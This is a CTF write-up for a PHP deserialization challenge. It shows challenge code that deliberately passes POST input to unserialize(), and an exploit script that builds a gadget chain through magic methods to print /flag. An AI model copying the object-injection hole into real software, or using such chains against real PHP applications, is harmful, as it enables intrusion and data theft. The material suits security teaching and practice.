# [NewStarCTF 公开赛赛道] UnserializeOne
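<?php
// Turn off reporting of every PHP error level for this request.
// NOTE(review): outside a CTF this also hides the warnings that a malformed
// or hostile serialized payload would raise; log errors rather than silence them.
error_reporting(0);
// Print this script's own source, syntax-highlighted, in the response.
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274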
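/**
 * Challenge class: prints a greeting on destruction and calls a stored
 * callable when isset() probes one of its inaccessible properties.
 *
 * Both magic methods act on property values. After unserialize() those values
 * are whatever the serialized input declared, not values set by this class.
 */
class Start
{
    /** @var mixed Appended to the greeting; an object here is cast via its __toString(). */
    public $name;

    /** @var mixed Invoked as a function by __isset(); the class itself never assigns it. */
    protected $func;

    /**
     * Echo the greeting when the object is destroyed.
     *
     * The concatenation converts $name to a string, so an object stored in
     * $name has its __toString() executed here.
     */
    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    /**
     * Called by PHP when isset()/empty() is used on an inaccessible or
     * undefined property of this object.
     *
     * @param string $var Name of the probed property (not used).
     *
     * Calls $func with no arguments. Nothing is returned, so the isset()
     * that triggered this evaluates to false.
     */
    public function __isset($var)
    {
        ($this->func)();
    }
}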
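/**
 * Challenge class holding the sensitive action: invoking an instance as a
 * function prints the contents of /flag.
 *
 * Neither property is assigned by the class; after unserialize() both come
 * straight from the serialized input.
 */
class Sec
{
    /** @var mixed Receiver of the check() call made in __toString(). */
    private $obj;

    /** @var mixed Argument handed to check(). */
    private $var;

    /**
     * String conversion hook.
     *
     * Calls check($var) on $obj before returning, so casting this object to a
     * string has a side effect on whatever object $obj holds.
     *
     * @return string Always "CTFers".
     */
    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    /**
     * Runs when the object is called like a function: reads /flag and echoes it.
     */
    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}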
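/**
 * Challenge class with a catch-all method handler.
 *
 * Any call to a method that Easy does not define lands in __call().
 */
class Easy
{
    /** @var mixed Receives the clone made in __call(). */
    public $cla;

    /**
     * Handle a call to an undefined or inaccessible method.
     *
     * @param string $fun Name of the method that was called (not used).
     * @param array  $var Arguments of that call; only the first one is read.
     *
     * Clones the first argument into $cla. Cloning an object runs that
     * object's __clone() if it defines one.
     */
    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}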
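/**
 * Challenge class whose clone hook probes a property on another object.
 */
class eeee
{
    /** @var mixed Object whose `cmd` property is tested in __clone(). */
    public $obj;

    /**
     * Runs on the copy after `clone`.
     *
     * Prints "success" when $obj->cmd is set. If `cmd` is not an accessible
     * property of $obj, the isset() is answered by $obj's __isset() instead.
     */
    public function __clone()
    {
        if (isset($this->obj->cmd)) {
            echo "success";
        }
    }
}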
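// SECURITY: unserialize() on a request parameter is PHP object injection.
// The sender decides which of the classes above are instantiated and what
// every property holds, and the magic methods of those objects then run with
// that data. The call is left unchanged because it is the point of the
// challenge. In real code, parse untrusted input with json_decode(), or at
// minimum call unserialize($data, ['allowed_classes' => false]).
if (isset($_POST['pop'])) {
    unserialize($_POST['pop']);
}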
exp:
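<?php
// Print this script's own source before the serialized string it produces.
highlight_file(__FILE__);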
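/**
 * Stand-in for the challenge's Start class: properties only, no methods.
 *
 * NOTE(review): $func is protected in the challenge source but public here,
 * so the serialized property name differs from the one the target class would
 * produce. unserialize() on PHP 7.1+ is understood to accept that mismatch,
 * so member visibility is not a defence against object injection.
 */
class Start
{
    public $name;
    public $func;
}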
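/**
 * Stand-in for the challenge's Sec class: properties only, no methods.
 *
 * Both properties are private in the challenge source and public here.
 */
class Sec
{
    public $obj;
    public $var;
}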
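/**
 * Stand-in for the challenge's Easy class: the single public property, no methods.
 */
class Easy
{
    public $cla;
}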
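/**
 * Stand-in for the challenge's eeee class: the single public property, no methods.
 */
class eeee
{
    public $obj;
}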
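// Build the nested object graph and print its serialized form. Each link
// names the magic method in the challenge source that the assignment reaches.
$res = new Start();
$res->name = new Sec();                  // link 1: Start::__destruct() casts $name to string -> Sec::__toString()
$res->name->obj = new Easy();            // link 2: Sec::__toString() calls check() on $obj -> Easy::__call()
$res->name->var = new eeee();            // link 3: Easy::__call() clones its first argument -> eeee::__clone()
$res->name->var->obj = new Start();      // link 4: eeee::__clone() runs isset($obj->cmd) -> Start::__isset()
$res->name->var->obj->func = new Sec();  // link 5: Start::__isset() calls $func -> Sec::__invoke()
echo serialize($res);
?>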
